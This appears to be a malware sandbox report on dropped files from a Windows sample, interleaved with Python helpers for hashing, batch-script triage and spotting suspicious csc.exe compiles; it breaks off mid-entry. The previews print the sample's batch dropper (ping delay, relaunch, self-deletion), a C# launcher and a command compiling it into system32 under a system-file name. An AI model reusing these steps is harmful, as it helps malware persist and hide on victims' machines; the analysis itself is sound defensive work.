                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
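The dropped-file entries above and below all carry the same field set (size, 8-bit entropy, MD5/SHA1/SHA-256/SHA-512, a libmagic-style file type). The following helper, an added example that is not part of the Joe Sandbox report, reproduces those fields for an artifact you hold locally so it can be checked against the report. The entropy is byte-level Shannon entropy in bits per byte, which is what the "Entropy (8bit)" field measures; the type sniffer is a deliberately coarse stand-in for libmagic and the sample inputs are constructed.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Byte-level Shannon entropy in bits per byte (0.0 to 8.0).

    Packed or encrypted payloads sit close to 8.0; plain text, like the
    AppLocker test stub above, lands around 4.
    """
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def sniff_type(data: bytes) -> str:
    """Coarse stand-in for the report's libmagic-derived "File Type" field."""
    if data[:2] == b"MZ":
        return "PE executable (MZ header)"
    if data.startswith(b"\xef\xbb\xbf"):
        return "UTF-8 text with BOM"
    if data and all(32 <= b < 127 or b in (9, 10, 13) for b in data):
        return "ASCII text"
    return "data"


def describe(data: bytes) -> dict:
    """Return the same fields the report prints for a dropped file."""
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy(data),
        "File Type": sniff_type(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def mismatches(data: bytes, reported: dict) -> list:
    """Fields where the artifact in hand disagrees with the report's values.

    Hashes are compared case-insensitively; entropy is compared with a small
    tolerance because the report prints a rounded float.
    """
    actual = describe(data)
    bad = []
    for field, want in reported.items():
        have = actual.get(field)
        if field == "Entropy (8bit)":
            if abs(float(have) - float(want)) > 1e-9:
                bad.append(field)
        elif str(have).upper() != str(want).upper():
            bad.append(field)
    return bad


if __name__ == "__main__":
    # Constructed input, not a file from the report.
    sample = b"# constructed sample text"
    for k, v in describe(sample).items():
        print(f"{k}: {v}")
```

Feed `describe()` the bytes of a file recovered from the sandbox or an endpoint and compare the hash fields; a mismatch on size or SHA-256 with a matching name usually means a different build of the same dropper, not the same artifact.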
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):167
                                                                                    Entropy (8bit):5.375569895482886
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7CwKCvE3JCPASBktKcKZG1t+kiE2J5xAI0p3oLHKn:hCRLuVFOOr+DE7gCvE5C4SKOZG1wkn2w
                                                                                    MD5:B41A5F743FC7D851FE6B4E8EC6FD4BF2
                                                                                    SHA1:E671E96364F9CA94EB307D1D1AC8BA6FA38C4857
                                                                                    SHA-256:BD10B99F0D57CF4177C4E1C362A48ADA9AA6F4DB8FCC5AC24A323FD87332E1DC
                                                                                    SHA-512:5F25D1CA8343A0B79FA5BA741E77A8ED9B0317269A8EB73998FECF89B3470E063EEDCFF4C49A53CBC80A37C205C5E7C41BD2545C9B68CBA58338C3FAB91F9EBE
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bCL7Nxg3GW.bat"
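The batch file above is the behaviour the signatures "Uses ping.exe to sleep" and "Uses ping.exe to check the status of other devices and networks" refer to: `ping -n 10 localhost` stalls for roughly nine seconds, then `start` relaunches the payload from C:\Recovery and `del` removes the script from the user's Temp directory. The following triage helper is an added example, not code from the report or from the sample; it restores the batch text from the Preview (the report renders the CRLF terminators as "..") and extracts those three steps. The regexes and the temp-directory heuristic are the author's assumptions.

```python
import re
from typing import Optional

# Constructed sample: the dropped batch file's Preview from the report, with the ".."
# placeholders the report uses for CRLF line terminators restored.
SAMPLE_BAT = (
    '@echo off\r\n'
    'chcp 65001\r\n'
    'ping -n 10 localhost > nul\r\n'
    'start "" "C:\\Recovery\\pzPgKRlGoglDaRzDTBMXwbN.exe"\r\n'
    'del /a /q /f "C:\\Users\\user\\AppData\\Local\\Temp\\\\bCL7Nxg3GW.bat"'
)

# ping against a loopback target with "-n N" is the batch-file "sleep": ping pauses
# about one second between echo requests, so the line stalls for roughly N-1 seconds.
PING_SLEEP = re.compile(
    r'\bping\b(?=.*\s-n\s+(\d+)\b)(?=.*\b(?:127\.0\.0\.1|localhost)\b)', re.I)
# start "" "<path>"  or  start <path>
START_TARGET = re.compile(
    r'\bstart\b\s+(?:"[^"]*"\s+)?"?([^"\s]+\.(?:exe|bat|cmd|vbs|ps1))"?', re.I)
# del [/a /q /f ...] "<path>.bat"
DEL_TARGET = re.compile(r'\bdel\b\s+(?:/\w+\s+)*"?([^"]+?\.(?:bat|cmd))"?', re.I)
# Assumed heuristic: a deleted script under a Temp directory is treated as self-cleanup.
TEMP_DIR = re.compile(r'\\(?:AppData\\Local\\)?Temp\\', re.I)


def analyze_batch(text: str, own_name: Optional[str] = None) -> dict:
    """Summarise delay, relaunch and self-delete behaviour of a batch script.

    own_name is the script's own file name, if known; it lets the caller
    distinguish real self-deletion from deleting some other temp script.
    """
    f = {"sleep_seconds": None, "relaunch_target": None, "deleted_script": None}
    for line in text.splitlines():
        if (m := PING_SLEEP.search(line)):
            f["sleep_seconds"] = max(int(m.group(1)) - 1, 0)
        elif (m := START_TARGET.search(line)):
            f["relaunch_target"] = m.group(1)
        elif (m := DEL_TARGET.search(line)):
            f["deleted_script"] = m.group(1)
    deleted = f["deleted_script"] or ""
    f["deletes_temp_script"] = bool(TEMP_DIR.search(deleted))
    f["deletes_self"] = bool(own_name) and deleted.lower().endswith("\\" + own_name.lower())
    f["delayed_relaunch_dropper"] = (
        f["sleep_seconds"] is not None
        and f["relaunch_target"] is not None
        and (f["deletes_temp_script"] or f["deletes_self"])
    )
    return f


if __name__ == "__main__":
    for k, v in analyze_batch(SAMPLE_BAT, own_name="bCL7Nxg3GW.bat").items():
        print(f"{k}: {v}")
```

Run over the batch files a sandbox or EDR drops to disk, the combination of a loopback ping with a count, a `start` of an executable outside Program Files or Windows, and a `del` of the script itself is a far stronger signal than any one of the three lines alone; ping against localhost is also what a detection rule keyed on "ping.exe checking other devices" will fire on, so the count and target are worth recording separately.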
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):25
                                                                                    Entropy (8bit):4.163856189774723
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:SBIcwVTgn:SOXVM
                                                                                    MD5:493A3747C039C743EE90F2948593E2C9
                                                                                    SHA1:159EA5EF1017D5FF2C80F03C8FF3359EF07B0299
                                                                                    SHA-256:935D9CDD9D768B88B990A588C9FB299E8D88F00ADDAEFF9B3AE1D8EB9288A24A
                                                                                    SHA-512:DED0CDD9E7A8C74324C2391DF02F995F464729C6322E3A2AED0BB927EEDCA22F313E435CCD4191F8F4481F55E34E3FDE9384B03648A29BE1429D677643FE2E68
                                                                                    Malicious:false
                                                                                    Preview:30SGT5egsn7Gc5LC9kz06x9Sk
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                    Category:dropped
                                                                                    Size (bytes):397
                                                                                    Entropy (8bit):4.920018222478599
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6Y9iFkD:JNVQIbSfhV7TiFkMSfhWlFkD
                                                                                    MD5:025F5E31BC0804FFB472CD3AA9F296CB
                                                                                    SHA1:ED7BF5D30C705186BD614AD9CCFD18B16DD3CADA
                                                                                    SHA-256:6770EB493D394597F7B308D27A939884C9C3767955C52A64573FE063E9D90B02
                                                                                    SHA-512:CA907CCB54A97BDCE02582873EE84C3C778B04456866EB5D1465EFA82DA06EF48DC85738042780A8E1DE23674E5ACE9CF91544CB85D01E01D6D4AE1BFFC4A682
                                                                                    Malicious:false
                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Adobe\StartMenuExperienceHost.exe"); } catch { } }).Start();. }.}.
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):250
                                                                                    Entropy (8bit):5.08213399887982
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23f8S5wSP:Hu7L//TRq79cQWfn5
                                                                                    MD5:007338B929F1D584056C640BD3BD0473
                                                                                    SHA1:CFF0683CF701589A8367ACF7C48C0BE24D836417
                                                                                    SHA-256:567A18517DC470A2DDAD8D7312CC58EBA9995FFE7171EDE0CA057F0E1676DD9E
                                                                                    SHA-512:E84DC26324024E58DFD277637ABEFD6A04AA23D16A1BCDD0A0E05094ABECF2279ED1378EDE26A9F7607C9EC7615D2AA77BDF0F1137331D6875810B715FE9E3C4
                                                                                    Malicious:true
                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.0.cs"
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):750
                                                                                    Entropy (8bit):5.248866071814358
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:KJN/I/u7L//TRq79cQWfn8KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWf8Kax5DqBVKVrdFAMb
                                                                                    MD5:A51F1EF6C27AFAD37C5B661DAFFED3C3
                                                                                    SHA1:7BEF70BB24C44CBBFED76AAB2C240DF37407F228
                                                                                    SHA-256:69E41AA28204C099BF827C734636ED328735821A15F5A48ECA448361754E7104
                                                                                    SHA-512:A4B0143539B1F390EEE3148917F70581A3256287490DCFA3857A274E10AA39C2D1DAA87B345901E527F17C644832849EE83233A90663C5BCA958017F8A62428F
                                                                                    Malicious:false
                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
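The three entries above show the whole chain behind the signature "Sigma detected: Dot net compiler compiles file from suspicious location": the sample writes a tiny C# launcher (the source that starts SecurityHealthSystray.exe.exe and a binary under C:\Program Files\Adobe) into a Temp directory, then invokes csc.exe with the argument string recorded in the second entry and captured with its banner in the third, emitting the result as C:\Windows\system32\SecurityHealthSystray.exe with /target:winexe so no console window appears. The following parser is an added example, not part of the report, that turns such a command line (with or without the leading csc.exe path) into the facts a detection rule needs. The directory patterns in USER_WRITABLE and PROTECTED are the author's assumptions, not a list from the report.

```python
import re

# Constructed from the csc.exe command line recorded in the report above.
SAMPLE_CMDLINE = (
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output '
    r'/R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" '
    r'/out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ '
    r'/target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.0.cs"'
)

# A token is a run of quoted and unquoted pieces, so /out:"C:\Program Files\x.exe" stays whole.
TOKEN = re.compile(r'(?:[^\s"]+|"[^"]*")+')
# Assumed list of user-writable locations a compiler should not normally read sources from.
USER_WRITABLE = re.compile(
    r'\\(?:Users\\[^\\]+\\AppData\\|Users\\Public\\|Windows\\Temp\\|ProgramData\\)', re.I)
# Assumed list of directories an ad-hoc compile should never write its output into.
PROTECTED = re.compile(r'^[a-z]:\\(?:Windows|Program Files(?: \(x86\))?)\\', re.I)
COMPILERS = ("csc.exe", "vbc.exe")


def assess_csc_cmdline(cmdline: str) -> dict:
    """Parse a csc.exe/vbc.exe command line, or just its argument string, and flag
    the combination seen in the report: source in a user-writable directory,
    output dropped under a protected system directory, windowless target."""
    toks = [t.replace('"', "") for t in TOKEN.findall(cmdline)]
    if toks and toks[0].lower().rsplit("\\", 1)[-1] in COMPILERS:
        toks = toks[1:]  # drop the compiler path itself
    r = {"sources": [], "out_path": None, "windowless": False, "unsafe": False}
    for t in toks:
        key, _, val = t.partition(":")
        key = key.lower()
        if key in ("/out", "-out"):
            r["out_path"] = val
        elif key in ("/target", "/t", "-target", "-t"):
            r["windowless"] = val.lower() == "winexe"  # last occurrence wins, as in csc
        elif t.lower() in ("/unsafe", "/unsafe+", "-unsafe"):
            r["unsafe"] = True
        elif not t.startswith(("/", "-")) and t.lower().endswith((".cs", ".vb")):
            r["sources"].append(t)
    src_bad = any(USER_WRITABLE.search(s) for s in r["sources"])
    out_bad = bool(r["out_path"] and PROTECTED.match(r["out_path"]))
    reasons = []
    if src_bad:
        reasons.append("source file in a user-writable directory")
    if out_bad:
        reasons.append("output written under a protected system directory")
    if r["windowless"]:
        reasons.append("/target:winexe, no console window")
    r["reasons"] = reasons
    # winexe alone is normal for GUI builds; the location checks carry the weight.
    r["suspicious"] = src_bad or out_bad
    return r


if __name__ == "__main__":
    for k, v in assess_csc_cmdline(SAMPLE_CMDLINE).items():
        print(f"{k}: {v}")
```

The same parser accepts the bare argument string from the dropped .cmdline file, which is what you will usually have when the compiler was launched through a response file rather than a visible process command line; note that writing into system32 requires the sample to already be running elevated, so a hit on the protected-output check is also evidence about the privilege the sample had.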
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):25
                                                                                    Entropy (8bit):4.323856189774723
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:D/HTQPThRC:DPcPThE
                                                                                    MD5:D0456AC382D137443BE43A712B543B85
                                                                                    SHA1:D1347C05484BE6BDDE24DD11419EA836A2B5F5D2
                                                                                    SHA-256:A911B3FC4790D50A1E9F45FDCBC4A1D5E8471C2A3259B72A3186EB95CD1B6098
                                                                                    SHA-512:FF02F638EAD58F4088AEA29B021FE5084AB7A043BEF989245816F723F344BAF9C2B0591FA262C7D3A9BFB2B5C2F05D20E6B6504520193270D0BE04FDEA7AC42F
                                                                                    Malicious:false
                                                                                    Preview:kVW0ANKBb8Xbv5xWrhEr6DtNs
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (723), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):723
                                                                                    Entropy (8bit):5.896900870455673
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:dBJa7k6yIK4792QZZfjgYBeHOo+FITiQeUzcEKktXnJUP1hYtyyIwRnO4GqOSn2:dN6UG95ZVjgYBeHONIGQeUzThbUPrYtW
                                                                                    MD5:C9EE21DF54776173599764DE3A13FABF
                                                                                    SHA1:3BA298903884922C622E34B762EE9AD422E12650
                                                                                    SHA-256:2C1C71913AAB75B0D1A4A4E30B2F231AE38072D84EB14E1D207CD146869B4B2C
                                                                                    SHA-512:08967FA4996DC47A71149516BF1F2EB8312B82CCF8A8401B2F1ED330718B5D86C136DB277FF5E985D052B2D99C9033CA0FBD1EE45738057DF1EBBD536C011253
                                                                                    Malicious:false
                                                                                    Preview:
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.519109060441589
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: Udzp7lL5ns.exe, Detection: malicious
                                                                                    • Filename: loader.exe, Detection: malicious
                                                                                    • Filename: 7aHY4r6vXR.exe, Detection: malicious
                                                                                    • Filename: 0V2JsCrGUB.exe, Detection: malicious
                                                                                    • Filename: PlZA6b48MW.exe, Detection: malicious
                                                                                    • Filename: wxl1r0lntg.exe, Detection: malicious
                                                                                    • Filename: HaLCYOFjMN.exe, Detection: malicious
                                                                                    • Filename: Z90Z9bYzPa.exe, Detection: malicious
                                                                                    • Filename: 0J5DzstGPi.exe, Detection: malicious
                                                                                    • Filename: HMhdtzxEHf.exe, Detection: malicious
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.519109060441589
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33792
                                                                                    Entropy (8bit):5.541771649974822
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33792
                                                                                    Entropy (8bit):5.541771649974822
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):24064
                                                                                    Entropy (8bit):5.492504448438552
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                                    MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                                    SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                                    SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                                    SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 33%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):24064
                                                                                    Entropy (8bit):5.492504448438552
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                                    MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                                    SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                                    SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                                    SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 33%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):22016
                                                                                    Entropy (8bit):5.41854385721431
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                    MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                    SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                    SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                    SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):22016
                                                                                    Entropy (8bit):5.41854385721431
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                    MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                    SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
